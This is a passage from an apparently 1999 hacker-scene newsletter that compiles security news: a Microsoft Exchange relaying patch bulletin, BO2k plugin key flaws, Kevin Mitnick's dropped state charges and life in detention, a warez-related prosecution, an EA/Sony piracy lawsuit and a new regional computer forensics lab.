deligated the job to a mechanic who you have found to be a fellow hacker; and you work on his homebrew 68010 unix box...because you've got a 68010 emulator and he works on your car because that's the kind he specializes in! Maybe you trade services with people for 50% of what ordinary people have to BUY WITH CASH!...you keep reading... (this is the stage where the author now finds himself...16 years into a career at a Fortune 5 company and age 42...still reading... your mileage may vary! <-((that's my code too! I co-wrote VEEP, (vehicle-economy-emissions-program, a complete auto-simulator, written in Fortran-5 for the Univac 1108 system using punch-cards!) for the Ford Foundation and the DOT while at JPL in 1973)) ) -Avatar-> (aka: Erik K. Sorgatz) KB6LUY +----------------------------+ TTI(es@soldev.tti.com)or: sorgatz@avatar.tti.com *Government produces NOTHING!* 3100 Ocean Park Blvd. Santa Monica, CA 90405 +----------------------------+ (OPINIONS EXPRESSED DO NOT REFLECT THE VIEWS OF CITICORP OR ITS MANAGEMENT!) @HWA 04.0 Microsoft security bulletin: Encapsulated SMTP address vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Microsoft Security Bulletin (MS99-027) -------------------------------------- Patch Available for "Encapsulated SMTP Address" Vulnerability Originally Posted: August 06, 1999 Summary ====== Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Exchange® Server. The vulnerability could allow an attacker to perform mail relaying via an Exchange server that is configured to act as a gateway for other Exchange sites using the Internet Messaging Service. Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-027faq.asp Issue ==== Exchange Server implements features designed to defeat "mail relaying", a practice in which an attacker causes an e-mail server to forward mail from the attacker, as though the server were the sender of the mail. However, a vulnerability exists in this feature, and could allow an attacker to circumvent the anti-relaying features in an Internet-connected Exchange Server. The vulnerability lies in the way that site-to-site relaying is performed via SMTP. Encapsulated SMTP addresses could be used to send mail to any desired e-mail address. The patch eliminates the vulnerability by making encapsulated SMTP addresses subject to the same anti-relay protections as non-encapsulated SMTP addresses. Affected Software Versions ========================= Microsoft Exchange Server 5.5 Patch Availability ================= ftp://ftp.microsoft.com/bussys/exchange/exchange-public /fixes/Eng/Exchg5.5/PostSP2/imc-fix NOTE: Line breaks have been inserted into the above URL for readability. More Information =============== Please see the following references for more information related to this issue. Microsoft Security Bulletin MS99-027: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-027faq.asp. Microsoft Knowledge Base (KB) article Q237927, XIMS: Messages Sent to Encapsulated SMTP Address Are Rerouted Even Though Rerouting Is Disabled, http://support.microsoft.com/support/kb/articles/q237/9/27.asp. Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp. Obtaining Support on this Issue ============================== This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp. Acknowledgments ============== Microsoft acknowledges Laurent Frinking of Quark Deutschland GmbH for bringing this issue to our attention and working with us to alert customers about it. Revisions ======== August 06, 1999: Bulletin Created. ----------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. © 1999 Microsoft Corporation. All rights reserved. @HWA 05.0 Disrupting Net Access a Cybercrime? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by D----Y -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Disrupting Net access a cybercrime? By Robert Lemos, ZDNN August 6, 1999 3:28 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310624,00.html A former system administrator of the University of Oklahoma has been charged under the state's computer-crime statutes with slowing the university's network to a crawl. Ryan Breding, 25, faces a single count of disrupting the university's Internet service in 1997, when hoards of incoming students downloaded pirated software from servers that he had allegedly set up on the university's network. "There were times when the authorized users -- students -- were not able to access the Internet at all," said Scott Palk, first assistant attorney general for Oklahoma's Cleveland County District Attorney's Office. Known as warez (pronounced "wares"), the software is identical to store-bought versions and includes serial numbers to spoof the copy protection mechanisms. The downloads overloaded the network, and many students were denied access. Getting up to speed While distributing such software is illegal, the district attorney's office has only charged Breding with interfering with network operation. On that charge alone, the former employee faces up to 10 years in the state penitentiary and up to $100,000 in fines. The Oklahoma Computer Crimes Act of 1984 makes it a felony to "willfully and without authorization disrupt or cause the disruption of computer services or deny or cause the denial of access or other computer services to an authorized user of a computer, computer system or computer network." An initial lack of familiarity with computer crimes stymied the investigation. State investigators and prosecutors needed to learn how to pursue digital criminals and examine the evidence. "These are new crimes -- at least locally," said Palk. "Some people had to undergo training to look into it." Palk stressed that, for the investigators, the case was a necessary learning experience. "This may be a hallmark of things to come," he said. "And we need to be ready." University officials would not comment for this story. A preliminary hearing is set to start on Aug. 17. @HWA 06.0 IDEA CAST BO2K PLUGIN VULNERABILITY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.securityfocus.com/ BO_CAST Plug-in Identical Key Vulnerability Bugtraq ID: 561 Remote: Yes Date Published: 08/04/99 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=561 Summary: The BO_CAST plugin for BO2k has a vulnerability that causes any password to generate the same CAST-256 key. Daniel Roethlisberger has released an updated version, BO_CAST 2.3 . It is available for download at: http://www.roe.ch/download/bo_cast.shtml IDEA BO2k Plug-in Identical Key Vulnerability Bugtraq ID: 562 Remote: Yes Date Published: 08/04/99 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=562 Summary: The IDEA encryption plug-in for BO2k version 0.3 has a flaw which causes any password to generate the same key.Maw~ has released version 0.4 which does not have this vulnerability. It is available at: http://www.wynne.demon.co.uk/maw/ @HWA 07.0 Mitnick gets a welcome birthday present from the LA DA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Http://www.hackernews.com Mitnick Gets Birthday Present from LA DA - Federal Sentencing Set For Today contributed by evenprime and turtlex The Los Angels District Attorney has given Kevin a surprise but welcome birthday present by dropping the state charges against him. Last Friday, Kevin's fifth birthday behind bars, the LA DA claimed that the six-year old case had been mischarged. Kevin had been charged with one count of illegally accessing a Department of Motor Vehicles computer and retrieving confidential information. (Which means he (or someone else) tricked a DMV employee over the phone into faxing him information) This action clears the way for Kevin to be released to a halfway house after his federal sentencing. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2310792,00.html News.com http://www.news.com/News/Item/0,4,40234,00.html?tt.abc..ticker.ne MSNBC http://www.msnbc.com/news/298088.asp Yahoo News http://dailynews.yahoo.com/h/zd/19990806/tc/19990806375.html Federal Sentencing Hearing Set For Today Once again Kevin Mitnick is scheduled to be sentenced for his federal charges. While he has already pleaded guilty and has accepted time served plus probation as punishment the issue of restitution still needs to be decided. The hearing will be held today (Monday) at 1:30 pm in Courtroom 12 at the LA Federal Courthouse, 312 N. Spring Street. FREE KEVIN http://www.freekevin.com/ ZDNET; -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- L.A. district attorney drops Mitnick case By Paul Elias, ZDNN August 6, 1999 6:09 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310792,00.html?chkpt=hpqs014 The Los Angeles district attorney gave Kevin Mitnick a birthday present Friday, dropping its six-year-old computer hacking case against the convicted hacker. That development could speed the release of the 35-year-old, removing an obstacle that could have prevented Mitnick from going free from federal prison soon after he is formally sentenced Monday in an unrelated federal case. "We're ecstatic," said Carolyn Hagin, one of Mitnick's attorneys in the state case. Deputy District Attorney Daniel Bershin said he dropped the state case because it had been "mischarged." Dubious 'computer' crime In 1993, the district attorney charged Mitnick with one count of illegally accessing a Department of Motor Vehicles computer and retrieving confidential information. The problem with that charge is that Mitnick, posing as a Welfare Fraud investigator, simply picked up a telephone on Dec. 24, 1992, and duped an employee accessing the DMV computer for him. "Since Mitnick did not personally connect to the DMV computer, but either he or someone else communicated with the DMV technician via a telephone conversation," Bershin wrote in his motion to dismiss the case, "it would be difficult to prove that Mitnick gained entry to the DMV computer, or that he instructed or communicated with the logical, arithmetical or memory function resources of the DMV computer." Bershin also confirmed at a July 28 hearing what many of Mitnick's supporters have been claiming f*or years: that their martyr has been the target of overzealous prosecution. Bershin first informed Los Angeles County Superior Court Judge Leland Harris of the district attorney's intention to drop the case at the July 28 hearing, a position that caught Harris off guard. As early as July 7, Deputy District Attorney Larry Diamond -- who had originally handled Mitnick's case -- was vigorously arguing against any reduction in Mitnick's $1 million bail pending trial. Judge 'curious' "So I'm curious as to why all of a sudden between July 7 and July 28 we have this radical change in position," the judge asked of Bershin. "Well, I think to be quite candid, the answer, or course, is Mr. Diamond," Bershin said. "I know that Mr. Diamond has wanted to handle this matter personally for a long time ... and I know that Mr. Diamond personally believes that Mr. Mitnick has been skating through the system for a long time and has a great interest in him." At that July 28 hearing, Harris refused to dismiss the case, saying to do so would be "a radical jump off the precipice to move to dismiss at this time." He ordered Bershin to submit a written motion to dismiss, which Harris granted Friday. Halfway house an option Harris' action clears the way for Mitnick's freedom. He is due to be sentenced in federal court for several hacking charges he pleaded guilty to in March. His attorney in the federal case, Donald Randolph of L.A.'s Randolph & Levanas, said he will ask Central District Judge Mariana Pfaelzer to order Mitnick into a halfway house after formally sentencing him to 68 months in prison. Randolph said he is optimistic Pfaelzer will grant the request, but if she doesn't Mitnick is set to go free sometime in January. Still at issue is the amount of money Mitnick must repay in restitution. His victims, including several high-tech giants such as Sun Microsystems (Nasdaq:SUNW) and Motorola Corp. (NYSE:MOT), say that Mitnick's hacking cost them millions of dollars in compromised intellectual property. Federal prosecutors are seeking $1.5 million in restitution. Mitnick, through Randolph, argues that he is leaving prison broke and that conditions of his probation, once he is released, severely restrict his access to a computer, the only way he knows how to make a living. Pfaelzer has indicated that she will order Mitnick to make some restitution, which she is scheduled to decide Monday as well. Mitnick was arrested in 1995 after a high-profile, two-year, electronic manhunt for him. -=- News.com District attorney drops Mitnick case By Dan Goodin Staff Writer, CNET News.com August 6, 1999, 7:35 p.m. PT The Los Angeles district attorney's office has dropped state charges against Kevin Mitnick, the notorious hacker who pleaded guilty in March to wire fraud and other federal charges, according to a published report. Mitnick, who will receive a five-year sentence if a federal judge accepts the plea, could be released from jail early next year. He has been held in federal custody since he was captured in a high-profile investigation in 1995. He also faced separate state charges as well. But Deputy District Attorney Daniel Bershin said today he was dropping those charges, because they had been "mischarged," ZD Network News is reporting. The case stemmed from 1993 charges that Mitnick unlawfully accessed computers at the state department of motor vehicles. Bershin admitted in a brief filed today that the case was flawed because Mitnick never accessed the computer himself, but allegedly used posed as a welfare fraud inspector over the phone in order to get a DMV to retrieve information, ZDNN said. Mitnick is scheduled to appear in federal court in Los Angeles this Monday for sentencing before U.S. District Judge Mariana Pfaelzer. -=- Kevin Mitnick appears at a hearing shortly after his arrest on Feb. 15, 1995, in Raleigh, N.C. L.A. drops Mitnick case Action could pave way for hacker’s freedom By Paul Elias ZDNN AUG. 3 — The Los Angeles district attorney gave Kevin Mitnick a birthday present Friday, dropping its six-year-old computer hacking case against the convicted hacker. That development could speed the release of the 35-year-old hacker, removing an obstacle that could have prevented Mitnick from going free from federal prison soon after he is formally sentenced Monday in an unrelated federal case. "Internet Underground" Hackers: Knights-errant or knaves? Will hackers or spies knot the Net? Deputy District Attorney Daniel Bershin said he dropped the state case because it had been mischarged. “WE’RE ECSTATIC” said Carolyn Hagin, one of Mitnick’s attorneys in the state case. Deputy District Attorney Daniel Bershin said he dropped the state case because it had been “mischarged.” In 1993, the district attorney charged Mitnick with one count of illegally accessing a Department of Motor Vehicles computer and retrieving confidential information. The problem with that charge is that Mitnick, posing as a Welfare Fraud investigator, simply picked up a telephone on Dec. 24, 1992, and duped an employee accessing the DMV computer for him. “Since Mitnick did not personally connect to the DMV computer, but either he or someone else communicated with the DMV technician via a telephone conversation,” Bershin wrote in his motion to dismiss the case, “it would be difficult to prove that Mitnick gained entry to the DMV computer, or that he instructed or communicated with the logical, arithmetical or memory function resources of the DMV computer.” MSNBC's Michael Brunker reports on Mitnick's plea bargain deal with the federal government Bershin also confirmed at a July 28 hearing what many of Mitnick’s supporters have been claiming for years: that their martyr has been the target of overzealous prosecution. Bershin first informed Los Angeles County Superior Court Judge Leland Harris of the district attorney’s intention to drop the case at the July 28 hearing, a position that caught Harris off guard. RADICAL CHANGE IN POSITION As early as July 7, Deputy District Attorney Larry Diamond — who had originally handled Mitnick’s case — was vigorously arguing against any reduction in Mitnick’s $1 million bail pending trial. “So I’m curious as to why all of a sudden between July 7 and July 28 we have this radical change in position,” the judge asked of Bershin. “Well, I think to be quite candid, the answer is, of course, Mr. Diamond,” Bershin said. “I know that Mr. Diamond has wanted to handle this matter personally for a long time ... and I know that Mr. Diamond personally believes that Mr. Mitnick has been skating through the system for a long time and has a great interest in him.” At that July 28 hearing, Harris refused to dismiss the case, saying to do so would be “a radical jump off the precipice to move to dismiss at this time.” He ordered Bershin to submit a written motion to dismiss, which Harris granted Friday. MITNICK’S FREEDOM? Harris’ action clears the way for Mitnick’s freedom. He is due to be sentenced in federal court for several hacking charges he pleaded guilty to in March. His attorney in the federal case, Donald Randolph of L.A.’s Randolph & Levanas, said he will ask Central District Judge Mariana Pfaelzer to order Mitnick into a halfway house after formally sentencing him to 68 months in prison. Randolph said he is optimistic Pfaelzer will grant the request, but if she doesn’t Mitnick is set to go free sometime in January. Still at issue is the amount of money Mitnick must repay in restitution. His victims, including several high-tech giants such as Sun Microsystems and Motorola Corp. say that Mitnick’s hacking cost them millions of dollars in compromised intellectual property. Federal prosecutors are seeking $1.5 million in restitution. Mitnick, through Randolph, argues that he is leaving prison broke and that conditions of his probation, once he is released, severely restrict his access to a computer, the only way he knows how to make a living. Pfaelzer has indicated that she will order Mitnick to make some restitution, which she is scheduled to decide Monday as well. Mitnick was arrested in 1995 after a high-profile, two-year, electronic manhunt for him. © 1999 ZDNet. All rights reserved. Reproduction in whole or in part in any form or medium without express written permission of ZDNet is prohibited @HWA 08.0 An Accurate Look At Mitnick's Life Behind Bars ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by staff There have been a few articles floating around the web that attempt to describe what Kevin is going through and the experiences he must endure. This one appears to be the most accurate and is based off only the third Mitnick interview granted to a media organization. Aviary Mag http://aviary-mag.com/News/Mitnick_Life/mitnick_life.html Kevin Mitnick´s Life -- Life in and around 6 South, 626 ATTRITION Staff Recently, two of the Attrition Staff writing for OSAll caught up with Kevin Mitnick and asked a few more questions about his living conditions. We presented him with an article by Kimberly Tracey (-1-) to establish a baseline for our talk and a reason for this followup. Life as it REALLY stands Here's a little bit about Kevin Mitnick's life at the Los Angeles Metro Detention Center (MDC), a bit more up to date: At the MDC there IS a yard for exercising. It is called the "rec deck" (Recreation Deck), rather than a yard and offers fresh air and sunlight, through a protected metal grating. On this patio Kevin has the option of playing basketball, walking or using the universal weights. The call for "lockup"(-1-) (known as 'lockdown' in most prisons including MDC) means that inmates must return to their cells. This is typically done for a count to ensure all inmates are still within the confines of the prison, or if any of the individuals get out of control. The times when they are all rounded up on the balcony means they are 'tossing cells' or doing a 'shakedown' (looking for contraband items). There are two 'units' per floor. Each unit has three TV's giving a total of six per floor. However, inmates from one unit may not use the resources from (or visit) another unit. Short of personal or legal visits (or court appearances), they do not leave their unit. As of May 24th, the vending machines were removed from the floors. Despite this, the microwaves (2 per unit) are still available. Along with the removal of vending, many items were added to the commissary. "I never buy food from the guards. No inmates including me purchase food or any items from MDC staff. It's strictly forbidden," Kevin says. The only source for Kevin to buy food is the commissary which offers a small variety of food (as well as toiletry items). We learned that the MDC does offer a couple exercise bikes that still work. "I use them all the time," Kevin smiles. While using one of the four phones in his unit, he often brings a stool from his cell to make the calls a bit more comfortable. Often times, the phones are turned on as early as 6am he says. The practice of 'buying' phone time is frowned upon by MDC staff. "The MDC does not allow inmates to have any cash or change, money is contraband so it's impossible to buy phone time for a 'few extra dollars,'" Kevin reports. Since February, Kevin has been able to use the government approved laptop on weekdays, with appropriate supervision. This time is usually spent sorting through the many gigs of evidence in preparation for his case. Now that a plea has been entered, time is spent making a much more educated guess at the actual damage figures being leveled at him. Unfortunately, the friendly advice about tapes and videos that was offered by Ms. Tracey is a bit inaccurate. "I appreciate any tapes or CD's, however, I'll have to wait until I'm released before I can listen to them." Kevin has no resource to play tapes or videos with or without his defense team present. No Place Like Home Each day that Kevin comes down to the visiting room, he carries a cardboard box overflowing with legal declarations, printed evidence, news articles and more. Ten minutes later, one of the MDC staff bring him the government approved laptop so that he can examine the bulk of the evidence. Outfitted with a locking device preventing floppy use, Kevin can only receive programs and evidence via CDROM. Dual booting into Redhat Linux and Windows 95, he is able access almost all of the evidence. To be more accurate, he can not access any of the evidence from the VMS backup tapes, megs of logs from various CDs, and of course the evidence still not provided by the government. After visiting his direct family or legal staff, Kevin returns to what he has been forced to call 'home' for four years, five months, and twenty one days. Not that he or anyone else is counting. Home is a cell smaller than the largest of private visitation rooms reserved for legal visits. Those rooms are perhaps 8x10, and yet still larger than Kevin's cell (that he shares with one other inmate). Cell #626 sits off the 'common area' and is seperated by a wooden door with a narrow glass window, offering less view than the narrow window that grants him a peek of the Roybal Federal Building. Along with the other inmate, the tiny cell has two bunks, a toilet, sink, all acceptable personal possessions and a tendancy to give people a cramped feeling. The common area is available to inmates from roughly 6:30 to 9:45. This area contains the bikes, microwaves, televisions and phones. Also provided are billiards and ping pong tables. While the common area may sound fun and recreational, it is not condusive to those trying to read or study legal briefs. Kevin's cell has a lovely view of the sixth floor of the Roybal Federal Building. A building with more stringent metal detectors than the MDC even. Even from the sixth floor, he gets to view more federal offices. A Day in the Life of.. With a better image of the material life surrounding Kevin, hopefully it will be easier to envision a typical day. 6:30 - wake up sign up for phone time (typically two 20 minute blocks) 7:00 - light breakfast (example: pastry and milk) 7:45 - head to patio, walk for half an hour 8:15 - weight lifting on patio 10:20 - use part of phone time 10:40 - grab lunch tray (example: eggs, burrito, potatoes, milk) lockdown for lunch 12:00 - "boring time" legal visits, phone calls, lay out in sun, read, socialize 3:45 - lockdown for count 4:45 - grab dinner tray for later use part of phone time 6:00 - ride bike, exercise 7:30 - shower eat dinner 9:45 - lockdown shave, read 11:00 - sleep During most of his workouts, Kevin is able to listen to an AM/FM walkman. For those of you interested in his music selection, his radio is programmed with the following stations: #1 93.1 #2 95.5 (KEZY) #3 103.1 #4 106.7 (KROQ) #5 98.7 (STAR) Drop Him A Line The letters and comments he receives are an uplift to say the least. Continued support and cards are welcome and he sends his thanks to the many people who have written him. Kevin enjoyed his birthday on August 6th, especially when the State of California opted to drop the outstanding charges leveled at him some seven years prior. Despite his birthday passing, cards or words of encouragement would be a great gift. Federal judge M. Pfaelzer sentencing him to the defense proposed restitution and 'time served' would be the best gift though. ;) If that is too much to ask, recommending his immediate release to a half way house would be acceptable. As Ms. Tracey said, sending him money via postal money orders is appreciated so that he can enjoy it right away. Another way to support Kevin is to purchase 'Free Kevin' bumper stickers from www.freekevin.com as the profit goes toward his legal defense fund. For those not keeping up, Kevin is due to be sentenced on Monday, August 9th at 1:30pm. Judge Pfaelzer can be found at the US Court House (-2-), room 12. Kevin Mitnick 89950-012 P.O. Box 1500 Los Angeles, CA 90053 Both of us have spent long hours locked in a government SCIF on previous security contracts. We were paid to be in these small depressing rooms and hack military networks. I could barely stand 8 hours in those 10x10 rooms full of computers with no windows. Now, Kevin gets to sit in his less than 10x10 cell for allegedly hacking other networks. It's sick and ironic. @HWA 09.0 Sony and EA Take Down Paradigm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by km Sony Computer Entertainment America and Electronic Arts have recently filed suit against alleged members of the warez group Paradigm in the U.S. District Court for the Northern District of California. The suit alleges that members of the group infringed on the copyrights and trademarks by distributing unauthorized copies of software from the two companies. United States Marshals recently conducted a court-sanctioned seizure and impounded evidence at the location of a participant of the group. SCEA and EA plan to continue the civil case against the pirates, they will also cooperate with law enforcement in the United States and will be turning over evidence to authorities in several other countries for possible criminal action against other group members. Yahoo Biz News http://biz.yahoo.com/bw/990806/ca_sony_co_1.html Friday August 6, 8:05 am Eastern Time Company Press Release Electronic Arts and Sony Computer Entertainment America Nab Internet Pirate Ring Companies file joint lawsuit against online pirates REDWOOD CITY, Calif. and FOSTER CITY, Calif.--(BUSINESS WIRE)-- August 6, 1999--Declaring war on a major Internet pirate ring that illegally uploaded, traded and distributed copies of their software, U.S.-based Electronic Arts(tm) (Nasdaq:ERTS - news), the industry's largest entertainment software publisher, and Sony Computer Entertainment America (SCEA), the company behind the PlayStation® game console, the world's best-selling videogame system, recently filed suit against certain alleged members of the ring in the U.S. District Court for the Northern District of California. Among other claims, the complaint asserts the defendants infringed the copyrights and trademarks of the two companies through the copying and distribution of software owned by Electronic Arts and SCEA. United States Marshals and lawyers for the companies recently conducted a court-sanctioned seizure and impounded evidence at the location of a participant of the group that calls itself ``Paradigm.'' During the seizure, a computer, hard drives, CDs and other items related to the illegal operation were impounded by the Marshals. The complaint further notes that the seizure, as well as the investigation which preceded it, produced a significant amount of evidence against members of the worldwide ring located in the United States, Canada, the United Kingdom, Germany, the Netherlands, Denmark, Norway, Portugal, Sweden, Russia and other locations. The evidence identified by true name and location dozens of participants in the distribution of pirated software belonging to the companies. While SCEA and Electronic Arts plan to continue the civil case against the pirates, they also continue to cooperate with law enforcement in the United States and will be turning over evidence to authorities in several of the other relevant countries for possible criminal action against the group's members. ``Putting an end to software piracy is a top priority for our industry,'' said Ruth Kennedy, senior vice president and general counsel, Electronic Arts. ``Electronic Arts and SCEA believe that the break up of pirate Internet rings like this will be key to our success in combating the rising problem of Internet piracy. This action is part of our ongoing plan to find and prosecute these thieves.'' ``Piracy of packaged entertainment software last year amounted to over US$3.2 billion worldwide for our industry alone. Electronic Arts alone lost more than $400 million. Internet pirate rings like Paradigm contribute to these losses by uploading games where the industrial pirates in places such as Asia or Russia can download them, turn them into copies of packaged goods and rush them to the street -- sometimes even before we get the legitimate goods to market,'' Kennedy noted. Pre-release or day-of-release software is highly prized by pirate Internet rings, that compete for ``points'' in the pirate community by being the first to ``release'' an illegal version of the product, often with copy protection and other content removed. Both companies praised the recently announced criminal ``I.P. Initiative'' by federal authorities including the Department of Justice, the FBI, and U.S. Customs, which as its goal has increased criminal prosecutions of pirates of intellectual property. According to Riley Russell, vice president of legal and business affairs, Sony Computer Entertainment America, ``We will work diligently to ensure that these counterfeiters are fully prosecuted and that others who think Internet piracy and `trading' is acceptable will think again.'' Russell noted that last year alone, counterfeiting cost SCEA and Electronic Arts losses of several hundreds of millions of dollars around the globe. Other Internet rings besides Paradigm that are also believed to be involved in the pirating of entertainment software include groups calling themselves ``Razor 1911,'' ``Class,'' ``Origin,'' ``Hybrid'', ``Divine'', ``Fairlight'' and others, with members based in the United States and in many other countries around the world. The companies are confident evidence developed in the current case as well as continuing efforts by the entertainment software industry will result in additional civil actions and criminal prosecution of members of these groups in the future. Electronic Arts, headquartered in Redwood City, California, is the world's leading interactive entertainment software company. Founded in 1982, Electronic Arts posted revenues of more than $1.2 billion for fiscal 1999. The company develops, publishes and distributes software worldwide for personal computers and video game systems. Electronic Arts markets its products under seven brand names: Electronic Arts, EA SPORTS(tm), Maxis(tm), ORIGIN(tm), Bullfrog(tm) Productions, Westwood Studios(tm) and Jane's® Combat Simulations. More information about EA's products and full text of press releases can be found on the Internet at http://www.ea.com. Sony Computer Entertainment America, a division of Sony Computer Entertainment America Inc., markets the PlayStation game console for distribution in North America, develops and publishes software for the PlayStation game console, and manages the U.S. third party licensing program. Based in Foster City, Calif., Sony Computer Entertainment America Inc. is a wholly-owned subsidiary of Sony Computer Entertainment Inc. Note to Editors: Electronic Arts, EA SPORTS, Maxis, ORIGIN, ORIGIN Systems, Bullfrog and Westwood Studios are trademarks or registered trademarks of Electronic Arts in the United States and/or other countries. Jane's is a registered trademark of Jane's Information Group, Ltd. PlayStation is a registered trademark of Sony Computer Entertainment Inc. Contact: Electronic Arts Pat Becker, 650/628-7832 or Sony Computer Entertainment America Molly Smith, 650/655-6044 10.0 Regional Computer Forensics Lab Set Up in San Diego ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by bluesky With $600,000 provided by two federal grants officials have set up the San Diego Regional Computer Forensics Laboratory with the support of 32 federal, state and local law enforcement agencies. The lab will be manned by 14 FBI trained specialists from local police agencies, including the San Diego Police Department and the Sheriff's Department. The lab will conduct court-approved wiretap operations that call for intercepting Internet communications as well as data recovery and analysis from seized computer systems. San Diego Union Tribune http://www.uniontrib.com/news/uniontrib/fri/metro/news_2m6lab.html First regional computer crime laboratory set up in San Diego Forensic team will retrieve electronic evidence for use in trials By Bruce V. Bigelow STAFF WRITER August 6, 1999 Overwhelmed by the use of computers in illegal activities, federal authorities have formed a regional crime lab in San Diego that specializes in retrieving computerized data and preserving the evidence for trial. The San Diego Regional Computer Forensics Laboratory is being hailed by organizers as the first of its kind, and it already has become a nationwide model for law enforcement in other cities -- even before its FBI-trained specialists have received their first case. The lab also is expected to eventually conduct court-approved wiretap operations that call for intercepting Internet communications. "All of us involved in the investigation and prosecution of computer crime view the San Diego lab as a prototype of what we hope to establish in various jurisdictions around the country," said David Schindler, a federal prosecutor in Los Angeles who won convictions of Kevin Mitnick and other notorious hackers. Most of the lab's 14 forensic specialists are sworn officers from local police agencies, including the San Diego Police Department and the Sheriff's Department. The lab's electronic infrastructure was designed by computer security experts at the Navy's Space and Naval Warfare Systems Command headquarters. "This is extremely important, not just a little important," said Alan Paller, a computer security expert at the SANS Institute, an international research and education cooperative for more than 60,000 system administrators. "The vast majority of discoveries (of network intrusions) go unresolved because there are no resources outside the FBI of any scale. If the probability of getting caught and put in jail is far-removed, why worry?" About $600,000 needed to renovate FBI offices and equip the facility was provided by two federal grants, said Mitch Dembin, an assistant U.S. attorney in San Diego who proposed the idea. "I sold this idea to the individuals who are doing this on their own in the wilderness of their own departments, and then I sold the idea to the department heads in those agencies," Dembin said. A total of 32 federal, state and local law enforcement agencies have agreed to support the lab, he added. "The idea is one I very much agree with," said Doug Tygar, a professor of computer science at the University of California Berkeley who specializes in computer security. "Unless they have the ability to deal with digital data, digital transactions, law enforcement agencies are going to be behind the curve." While the FBI established a computer forensics lab at its Washington headquarters years ago, experts say the agency also has maintained tight controls over the software tools used by its forensic specialists. "Until now, the FBI only trained its own people," Dembin said. The San Diego lab's staff members, who completed their FBI training seven weeks ago, are now working in temporary quarters until work on the new facility is completed in the next month or so. "What they're doing right now is developing the protocols and processes that will be applied to any case," Dembin said. "We're already receiving inquiries from all over country . . . which is interesting since we haven't prosecuted a single case yet." The interest prompted Dembin to organize a session about the San Diego lab during the High Technology Crime Investigation Association's annual meeting, to be held in San Diego's Town & Country Convention Center next month. The regional lab will help set forensic standards for local investigators and provide guidance in the way search warrants are served, computers are seized and data is retrieved for evidence at trial, said Bill Gore, who supervises the FBI office in San Diego. "We've been pretty lucky, I think, because so far the defense attorneys haven't really homed in on the procedures that we use," said Gore. The presentation of computerized data at trial can be as complex as DNA evidence, he added. The lab's investigators also are expected to deal with tricky investigations, such as a handful of employees who are using a corporate computer network for illegal activities. The "courts are reluctant to let the U.S. attorney shut down a business" by seizing control of a company's entire computer system, Dembin said, "so we have to come up with tools that minimize our interference with commerce." For Dembin and other prosecutors, however, a more practical problem stemmed from protracted delays in the analysis of computer-based evidence seized in cases that ranged from securities fraud to drug crimes. "There's been a bottleneck in analyzing computer or electronic evidence," said Schindler, who usually works with FBI forensics experts in Los Angeles. Said Dembin: "Putting aside the question of whether the forensics was done right, cases were getting disposed of before the seized computers were even analyzed." Dembin's first brush with computer crime occurred in 1991, when he prosecuted a disgruntled employee who tried to sabotage General Dynamics computers in San Diego with a "logic bomb." Since then, the 45-year-old prosecutor has handled his own share of malicious hacker cases. Over the past eight years, Dembin also saw how con artists converted their telemarketing scams into Internet schemes, and he oversaw bank fraud cases that relied on computerized financial records. "Now more and more the only place where documentary evidence exists is on the computer," Dembin said. "People are keeping their personal records of everyday activities on their computers, and criminal society is no different." Copyright 1999 Union-Tribune Publishing Co. 11.0 University Sys Admin Faced with 10 Years for Using Too Much Bandwidth ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evenprime A former University of Oklahoma systems administrator has been charged with using too much bandwidth. He faces a single count of disrupting the universities internet service after he allegedly set up a warez site on the University owned servers. While not charged with piracy or copyright infringement the local DA decided to prosecute under the Oklahoma Computer Crimes Act of 1984 which states that it is a felony to "willfully and without authorization disrupt or cause the disruption of computer services or deny or cause the denial of access or other computer services to an authorized user of a computer, computer system or computer network." He faces up to 10 years in the state penitentiary and up to $100,000 in fines. (So now it is a crime to have a popular site? This article fails to mention if this person was a legitimate user of the network to begin with.) ZD Net 